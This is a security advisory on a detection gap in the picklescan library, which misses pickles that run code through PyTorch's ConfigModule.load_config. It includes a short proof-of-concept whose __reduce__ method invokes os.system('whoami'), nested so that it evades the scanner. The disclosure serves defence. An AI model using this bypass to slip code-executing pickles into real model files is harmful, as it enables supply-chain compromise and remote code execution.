logo

GHSA-vv6j-3g6g-2pvj picklescan

Package

Manager: pip
Name: picklescan
Vulnerable Version: >=0 <0.0.28

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Picklescan missing detection when calling pytorch function torch.utils._config_module.load_config ### Summary Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils._config_module.load_config function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import pickle from torch.utils._config_module import ConfigModule class Evil: def __reduce__(self): return (os.system, ('whoami',)) class EvilTorchUtilsConfigModuleLoadConfig: def __reduce__(self): evil_payload = pickle.dumps(Evil()) return ConfigModule.load_config, (None, evil_payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Metadata

Created: 2025-08-22T16:58:14Z
Modified: 2025-08-22T16:58:14Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-vv6j-3g6g-2pvj/GHSA-vv6j-3g6g-2pvj.json
CWE IDs: ["CWE-345"]
Alternative ID: N/A
Finding: F204
Auto approve: 1